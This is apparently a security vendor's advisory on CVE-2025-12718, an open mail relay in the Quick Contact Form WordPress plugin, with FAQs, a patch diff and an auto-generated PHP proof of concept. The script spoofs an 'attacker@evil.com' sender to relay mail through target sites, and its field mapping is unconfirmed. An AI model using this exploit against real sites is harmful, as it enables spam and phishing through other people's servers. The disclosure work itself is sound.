What is CVE-2025-12718?

CVE-2025-12718 is a medium severity vulnerability found in the Quick Contact Form plugin for WordPress, affecting versions up to and including 8.2.6. It allows unauthenticated attackers to exploit an open mail relay, enabling them to send emails from arbitrary addresses through the vulnerable site.

How does the vulnerability work?

The vulnerability arises from the ‘qcf_validate_form’ AJAX endpoint, which allows user-controlled parameters to set the ‘from’ email address. Attackers can send a POST request with a controlled email address, allowing them to relay emails without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Quick Contact Form plugin version 8.2.6 or earlier is affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Quick Contact Form plugin installed on your WordPress site. If it is version 8.2.6 or earlier, it is vulnerable and needs to be updated.

How can I fix this vulnerability?

The vulnerability is fixed in version 8.2.7 of the Quick Contact Form plugin. Administrators should update their plugin to this version or later to mitigate the issue.

What does a CVSS score of 5.8 mean?

A CVSS score of 5.8 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for full system compromise, it can still be exploited to send spam or phishing emails, potentially damaging the site’s reputation.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to spam distribution, phishing campaigns, and damage to the site’s reputation. Although it does not expose sensitive data, it can facilitate social engineering attacks.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can send a POST request to the vulnerable AJAX endpoint with a controlled ’email’ parameter. This allows the attacker to specify a spoofed sender address and send emails to arbitrary recipients.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Quick Contact Form plugin until a secure version can be installed. Additionally, monitor your server for unusual email activity.

Are there any other security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation, themes, and all other plugins are up to date. Implement security plugins that can help monitor and protect against vulnerabilities.

How can I report any suspicious activity related to this vulnerability?

If you notice any suspicious activity or potential exploitation of this vulnerability, report it to your hosting provider and consider notifying relevant security authorities for further investigation.

Where can I find more information about CVE-2025-12718?

More information about CVE-2025-12718 can be found on the National Vulnerability Database or security advisories related to the Quick Contact Form plugin. Keeping abreast of security updates from the plugin developers is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12718: Quick Contact Form <= 8.2.6 – Unauthenticated Open Mail Relay (quick-contact-form)

CVE ID CVE-2025-12718

Plugin quick-contact-form

Severity Medium (CVSS 5.8)

CWE 20

Vulnerable Version 8.2.6

Patched Version 8.2.7

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12718:
This vulnerability is an unauthenticated open mail relay in the Quick Contact Form WordPress plugin. The flaw allows attackers to abuse the plugin’s email sending functionality to relay arbitrary emails through the vulnerable WordPress site. The CVSS score of 5.8 reflects a medium severity impact.

The root cause lies in the qcf_validate_form AJAX endpoint’s handling of the ’email’ parameter. In the vulnerable code within quick-contact-form/legacy/functions/qcf_process_form.php, lines 64-69 show a conditional block that accepts a user-controlled ’email’ GET parameter. The code checks if $_GET[“email”] is set, then assigns its value to $qcf_email after sanitization. This $qcf_email variable later becomes the ‘from’ address in email headers. The vulnerability exists because this parameter override occurs before email construction, allowing attackers to control the sender address.

Exploitation involves sending a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘qcf_validate_form’. Attackers must include the ’email’ parameter in the GET string with a value they control as the sender address. The attacker also provides recipient information through the contact form fields. The plugin processes this request without authentication checks, using the attacker-supplied email address in the ‘From’ header of the outgoing mail. This creates a mail relay that can send messages appearing to originate from arbitrary addresses.

The patch removes the vulnerable conditional block entirely. In the patched version, lines 64-69 from the original file are replaced with a single line that only uses stored email configuration or the site administrator’s email. The $qcf_email variable now derives exclusively from $qcfemail[$id] or get_bloginfo(‘admin_email’), eliminating user control. The patch also updates the plugin version from 8.2.6 to 8.2.7 in quick-contact-form/quick-contact-form.php.

Successful exploitation enables attackers to send emails with spoofed sender addresses through the vulnerable WordPress site. While the vulnerability does not grant access to email content beyond contact form submission details, it allows spam distribution, phishing campaigns, and reputation damage to the site domain. The mail relay functionality could also facilitate social engineering attacks by making malicious emails appear to originate from legitimate site addresses.

Differential between vulnerable and patched code

Code Diff

--- a/quick-contact-form/legacy/functions/qcf_process_form.php
+++ b/quick-contact-form/legacy/functions/qcf_process_form.php
@@ -64,11 +64,8 @@
     $content = '';
     $auto = qcf_get_stored_autoresponder( $id );
     $hd = ( $style['header-type'] ? $style['header-type'] : 'h2' );
-    $qcfemail = qcf_get_stored_email();
-    $qcf_email = ( $qcfemail[$id] ? $qcfemail[$id] : get_bloginfo( 'admin_email' ) );
-    if ( isset( $_GET["email"] ) ) {
-        $qcf_email = sanitize_email( $_GET["email"] );
-    }
+    $qcfemail  = qcf_get_stored_email();
+    $qcf_email = ( ! empty( $qcfemail[ $id ] ) ? $qcfemail[ $id ] : get_bloginfo( 'admin_email' ) );
     $values['qcfname2'] = ( $values['qcfname2'] ? $values['qcfname2'] : $qcf_email );
     if ( !empty( $reply['replytitle'] ) ) {
         $reply['replytitle'] = apply_filters( 'qcf_reply_title_h2_markup', '<' . $hd . ' class="reply-title">' ) . $reply['replytitle'] . apply_filters( 'qcf_reply_title_end_h2_markup', '</' . $hd . '>' );
@@ -269,7 +266,7 @@
     }
     $headers .= "MIME-Version: 1.0rn" . "Content-Type: text/html; charset="utf-8"rn";
     $message = $sendcontent;
-    $emails = qcf_get_stored_emails( $id );
+    $emails  = qcf_get_stored_emails( $id );
     if ( function_exists( 'qcf_select_email' ) || $emails['emailenable'] ) {
         $email = qcf_redirect_by_email( $id, $values['qcfname5'] );
         if ( $email ) {
--- a/quick-contact-form/quick-contact-form.php
+++ b/quick-contact-form/quick-contact-form.php
@@ -3,8 +3,8 @@
  * Plugin Name: Quick Contact Form
  * Plugin URI: https://wpexperts.io/
  * Description: A really, really simple GDPR compliant contact form. There is nothing to configure, just add your email address and it's ready to go. But you then have access to a huge range of easy to use features.
- * Version: 8.2.6
- * Author: Fullworks
+ * Version: 8.2.7
+ * Author: Quick Contact Form
  * Author URI: https://wpexperts.io/
  * Requires PHP: 5.6
  * Requires at least: 4.6
@@ -53,7 +53,7 @@
 		$freemius->add_action( 'after_uninstall', array( 'Quick_Contact_FormControlUninstall', 'uninstall' ) );

 		$plugin = new Plugin( 'quick-contact-form',
-			'8.2.6',
+			'8.2.7',
 			$freemius );
 		$plugin->run();

@@ -62,5 +62,4 @@
 	run_Quick_Contact_Form();
 } else {
 	die( esc_html__( 'Cannot execute as the plugin already exists, if you have a free version installed deactivate that and try again', 'quick-contact-form' ) );
-}
-
+}
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12718 - Quick Contact Form <= 8.2.6 - Unauthenticated Open Mail Relay

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Attacker-controlled sender address
$spoofed_sender = 'attacker@evil.com';

// Recipient address (could be any email)
$recipient_email = 'victim@target.com';

// Build the AJAX request URL with the vulnerable 'email' parameter
$ajax_url = $target_url . '?action=qcf_validate_form&email=' . urlencode($spoofed_sender);

// Contact form data that will be included in the email body
$post_data = [
    'qcfname1' => 'John Doe',          // Name field
    'qcfname2' => $recipient_email,    // Recipient email (target)
    'qcfname3' => 'Spam Subject',      // Subject line
    'qcfname4' => 'Malicious content', // Message body
    'qcfname5' => 'contact',           // Form type
    'qcfname6' => '1',                 // Form ID
    'qcfname7' => '',                  // Optional fields
    'qcfname8' => '',
    'qcfname9' => '',
    'qcfname10' => '',
    'qcfname11' => '',
    'qcfname12' => '',
    'qcfname13' => '',
    'qcfname14' => '',
    'qcfname15' => '',
    'qcfname16' => '',
    'qcfname17' => '',
    'qcfname18' => '',
    'qcfname19' => '',
    'qcfname20' => ''
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "[+] Request sent successfully.n";
    echo "[+] Email should be sent from: $spoofed_sendern";
    echo "[+] Email should be sent to: $recipient_emailn";
    if (strpos($response, 'success') !== false) {
        echo "[+] Server responded with success message.n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-12718?
Understanding the vulnerability
CVE-2025-12718 is a medium severity vulnerability found in the Quick Contact Form plugin for WordPress, affecting versions up to and including 8.2.6. It allows unauthenticated attackers to exploit an open mail relay, enabling them to send emails from arbitrary addresses through the vulnerable site.
How does the vulnerability work?
Mechanics of the exploitation
The vulnerability arises from the ‘qcf_validate_form’ AJAX endpoint, which allows user-controlled parameters to set the ‘from’ email address. Attackers can send a POST request with a controlled email address, allowing them to relay emails without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Quick Contact Form plugin version 8.2.6 or earlier is affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, verify the version of the Quick Contact Form plugin installed on your WordPress site. If it is version 8.2.6 or earlier, it is vulnerable and needs to be updated.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 8.2.7 of the Quick Contact Form plugin. Administrators should update their plugin to this version or later to mitigate the issue.
What does a CVSS score of 5.8 mean?
Interpreting the risk level
A CVSS score of 5.8 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for full system compromise, it can still be exploited to send spam or phishing emails, potentially damaging the site’s reputation.
What are the practical risks of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to spam distribution, phishing campaigns, and damage to the site’s reputation. Although it does not expose sensitive data, it can facilitate social engineering attacks.
What is the proof of concept for this vulnerability?
Demonstration of the exploit
The proof of concept demonstrates how an attacker can send a POST request to the vulnerable AJAX endpoint with a controlled ’email’ parameter. This allows the attacker to specify a spoofed sender address and send emails to arbitrary recipients.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the Quick Contact Form plugin until a secure version can be installed. Additionally, monitor your server for unusual email activity.
Are there any other security measures I should take?
Enhancing overall security
In addition to updating the plugin, ensure that your WordPress installation, themes, and all other plugins are up to date. Implement security plugins that can help monitor and protect against vulnerabilities.
How can I report any suspicious activity related to this vulnerability?
Contacting authorities
If you notice any suspicious activity or potential exploitation of this vulnerability, report it to your hosting provider and consider notifying relevant security authorities for further investigation.
Where can I find more information about CVE-2025-12718?
Additional resources
More information about CVE-2025-12718 can be found on the National Vulnerability Database or security advisories related to the Quick Contact Form plugin. Keeping abreast of security updates from the plugin developers is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations